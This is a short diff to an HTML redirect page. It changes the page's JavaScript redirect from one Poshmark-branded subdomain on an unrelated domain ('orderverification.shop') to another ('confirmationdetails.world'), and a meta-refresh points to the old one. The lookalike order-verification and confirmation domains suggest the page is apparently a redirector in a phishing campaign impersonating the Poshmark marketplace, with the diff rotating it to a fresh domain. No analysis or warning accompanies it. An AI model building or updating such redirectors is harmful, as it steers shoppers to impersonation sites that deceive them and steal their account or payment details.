--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
   <meta http-equiv="refresh" content="0; url=https://poshmark.orderverification.shop/6921087">
   <title>Redirecting...</title>
   <script>
-    window.location.replace("https://poshmark.orderverification.shop/6921087");
+    window.location.replace("https://poshmark.confirmationdetails.world/86176360");
   </script>
 </head>
 <body>
